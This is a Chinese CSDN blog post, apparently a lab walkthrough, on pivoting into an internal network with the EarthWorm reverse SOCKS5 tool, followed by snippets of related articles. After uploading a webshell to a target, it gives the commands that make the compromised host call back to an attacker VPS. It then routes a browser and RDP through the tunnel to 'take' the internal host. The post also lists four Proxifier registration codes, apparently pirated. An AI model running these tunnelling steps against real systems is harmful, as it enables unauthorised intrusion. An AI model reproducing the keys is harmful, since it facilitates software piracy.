EW之Socks5反向代理内网穿透

最新推荐文章于 2024-05-12 12:27:38 发布
最新推荐文章于 2024-05-12 12:27:38 发布
阅读量2.3k 收藏 9
点赞数 5
文章标签: linux windows 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46789316/article/details/120433162
版权

EW(earthworm)功能介绍

EW 是一套便携式的网络穿透工具,具有 SOCKS v5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透。该工具能够以“正向”、“反向”、“多级级联”等方式打通一条网络隧道,直达网络深处,用蚯蚓独有的手段突破网络限制,给防火墙松土。

准备阶段

在靶机网站上传一句话马使用蚁剑连接

ipconfig /all

在这里插入图片描述

一台外网vps:110.42.229.X
一台内网靶机:192.168.1.5(3389开放)

内网机器(无公网ip需要反弹到公网,需要在vps监听
vps服务端执行:

./ew_for_linux64 -s rcsocks -l 6666 -e 6667

这条命令的意思是说让公网服务器监听6666和6667端口,等待攻击者机器访问6666端口,目标机器访问6667端口。
如果机器报错:

Error: bind port xxxx

则可能是因为该端口被进程占用,查询占用进程,杀掉该进程,重新执行命令即可。

lsof -i:xxxx

内网机器执行:

ew_for_Win.exe -s rssocks -d vps的ip -e 6667

使用方式:sock5代理访问的6666端口
在这里插入图片描述
火狐添加代理

在这里插入图片描述
访问192.168.1.5
在这里插入图片描述
在这里插入图片描述
可以访问内网,实现内网穿透

使用proxifier代理

Proxifier Standard 版本注册码:
QBZ9F-D3VWW-BQ7YC-XUKWY-RB95P
D6ZMK-HY6A3-LYR3S-8U8KA-YEE6E
AVZCR-B2SKY-FEYW3-8AR76-2R5ZG
C8ZXW-D2TW8-QL7WV-U3PH7-38L4H
在这里插入图片描述
vps的IP和刚刚的6666端口
在这里插入图片描述
添加规则
localhost改为direct
在这里插入图片描述
添加程序与路由–browse 选择mstsc.exe
在这里插入图片描述
在这里插入图片描述
即可
在这里插入图片描述
在这里插入图片描述
拿下内网主机

Sweetie_x
关注
  • 5
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
使用EWSocks5代理进行内网渗透1
08-03
1. 如何使用EW做反向Socks5代理 2. 浏览器如何设置Socks5代理访问目标内网Web服务 3. 利用proxychains给终端设置Socks5代理
rsocks:SOCKS 45反向代理服务器
05-10
RSOCKS是反向代理服务器,用于通过SOCKS 4/5代理传输特定主机的流量。 对于在没有SOCKS代理支持的应用程序中使用SOCKS 4/5很有用。 安装 $ pip install rsocks 或者 $ easy_install rsocks 要升级到最新版本,您可以...
ew代理三层靶机实验穿透
m0_58595840的博客
01-11 1156
EW工具实现三层内网穿透
EarthWorm(ew):复杂网络环境下端口转发及SOCKS5代理工具
ZL_1618的博客
08-14 1613
本文是在学习了下面参考文章的基础上,基于自己的理解和心得补充了数据流量拓扑图,这样更好理解工具的使用场景和记住命令;本文仅作为技术交流。1.耐下心来刚开始看到这个工具本想一看而过,后来耐心的学习一下,打开了新世界。2.动手实践看了很多文章也包括官方的文档;发现对小白来说想了解工具功能和不同场景,单看文字不直观,没有网络拓扑很难理解。所以本着自己边学习边记录边分享的精神,整理了这篇文章。3.横向比较3.1还发现了这个作者的另一个好用的工具Termite;目前EW和Termite作者已经不维护了;
frp内网穿透(socks隧道)_frp内网穿透+scoks5协议配置
最新发布
2401_84970035的博客
05-12 922
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
EW代理工具的使用说明
Ays.Ie的博客
05-18 1622
本篇介绍了ew代理转发工具,以及简单的应用
Cobaltstrike系列教程(九)内置Socks与神器EW
J0o1ey Blog
01-19 7014
0x001-Socks概念 目前利用网络防火墙将组织内部的网络结构与外部网络如 INTERNET 中有效地隔离开来,这种方法正变得逐渐流行起来。这些防火墙系统通常以应用层网关的形式工作在网络之间,提供受控的 TELNET 、 FTP 、 SMTP 等...
EW(EarthWorm) 反向 socks5 代理
为之的博客
12-14 1625
今天本想对学校的内网服务器进行人生中第一次横向渗透,奈何情况不允许,但好歹学习了一些东西,总要写下来保存 工具: EW:https://github.com/idlefire/ew proxychains:https://github.com/rofl0r/proxychains-ng 小米随身wifi:http://bigota.miwifi.com/xiaoqiang/miniwifi/miwifi_setup_1b601_848.exe phpstudy:https://m.x...
使用Earthworm (EW) 做Socks5代理
01-09
正向代理 1.选择合适的ew文件(将文件ew_…改为ew.exe,为了在命令行少敲几个字母),上传到边缘服务器 2.边缘服务器输入 ew.exe -s ssocksd -l 8000 3.可借助proxifier工具配置攻击机整台机器的代理(proxifier添加...
Socks5进程代理DLL调用_Sockset_代理_socks5_dll_进程代理_
10-03
Socks5进程代理DLL,配套调用表,在压缩包里面
Python中使用socks5设置全局代理的方法示例
12-20
加入socks5代理后,可以获得当前程序的全局代理可以 正常访问 import socket import socks socks.set_default_proxy(socks.SOCKS5, "127.0.0.1", 10808) socket.socket = socks.socksocket 0x04 测试代码 # -*-
ReverseSock5Proxy: 简化网络代理的反向 SOCKS5 代理工具
gitblog_00001的博客
03-05 500
ReverseSock5Proxy: 简化网络代理的反向 SOCKS5 代理工具 ReverseSock5Proxy 是一个轻量级的、基于 Python 的反向 SOCKS5 代理工具。它能够帮助您更轻松地配置和管理网络代理,让您的访问更加安全和便捷。 什么是 ReverseSock5Proxy? ReverseSock5Proxy 是一个开源的 Python 脚本,实现了将多个客户端连接重定向到...
内网穿透之利用Neo-reGeorg工具完成socks5代理
li1136594919的博客
09-12 824
选择靶机能够解析的文件并将其上传到靶机web应用的目录上(使用浏览器访问确认其上传成功且目录正确),然后kali启动代理。修改/etc/proxychains.conf配置文件,将其他socks5代理注释掉,增加。此时firefox的所有流量都会通过burpsuite到达本地1080端口然后到靶机进行转发。利用firefox的foxyproxy插件新增到burpsuite的代理。利用firefox的foxyproxy插件新增到本地1080端口socks5的代理。使用前需要先生成key,进入项目目录,输入。
内网渗透实战——红日ATT&CK系列靶场(一)学习笔记
热门推荐
ierciyuan的博客
08-01 1万+
内网渗透实战攻打红日靶场第一关,包括环境配置、信息收集、漏洞利用、内网信息收集、内网攻击、横向移动等操作。
Eartworm做Socks5代理内网穿透
yuchen的博客
01-19 527
0x00:配置环境 虚拟机:windows7 受害机并开启80端口->192.168.157.130 虚拟机:windows03 受害机(代理机)->192.168.157.132 虚拟机:kali 攻击机 ->192.168.157.138 0x01:代理主机设置 使用win+r打开命令行,输入cmd,把ew_for_Win.exe拖入终端,输入命令 ew_for_Win.exe -s ssocksd -l 6666 0x02:kali虚拟机设置proxychains.conf文件配
反向socks5代理工具
我想做一个好人<svg/onload=Alert`1`>(
09-08 751
github.com/yuxiaokui/gohtran 闲来无事,用golang写了个反向socks5代理工具. 方便搞渗透的同学们使用. 首先在公网VPS上执行listener 3389 33333 3389端口是用来监听肉鸡上线的,后面的33333端口是开放的socks5服务端口. 然后在内网的肉鸡中执行client vps_ip:3389 webshell也可以玩哦. OK,配上socks5代理,尽情内网漫游吧. 本工具完全开源,大家随意修改. ...
EW隧道搭建
weixin_45007073的博客
05-04 1659
EW代理技术常见的网络场景简介socks代理和端口转发的区别socks代理和端口转发的异同点一级网络环境 常见的网络场景 服务器在内网中,可以任意访问外部网络 服务器在内网中,可以访问外部网络,但服务器安装了防火墙来拒绝敏感端口的连接 服务器在内网中,对外只开放了部分端口(80端口),且服务器不能访问外部网络 例如如下为常见的内网渗透测试环境 简介 EarthWorm简称EW,是一套便携式的网络工具,具有SOCKS5服务架设和端口转发功能,可以在复杂的网络环境中实现网络穿透。EW能够以正向、反向、多级
socks5 proxy 转换 http proxy 的方法
onlyellow的博客
09-05 8291
①. privoxy 以centos7为例进行讲解。 1. http://www.privoxy.org/sf-download-mirror/ 下载源码进行编译。(如果有对应平台的binary包,直接用也行。可惜官方没有提供centos7的。所以我只能源码编译安装) 2. 下载后解压,进入目录。make && make install (编译中用到gcc/autoconf等命令,所以如果提
frp socks5代理 内网渗透
10-18
frp是一款高性能的反向代理工具,可以将内网服务映射到公网上,从而实现内网穿透。而socks5代理是一种网络协议,可以实现TCP、UDP等协议的代理转发。结合使用frp和socks5代理,可以实现内网渗透的目的。 具体实现方法如下: 1. 在公网服务器上安装frp,并配置好反向代理规则。 2.*** 在攻击机上使用socks5代理客户端连接内网机器的socks5代理服务,即可访问内网服务。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值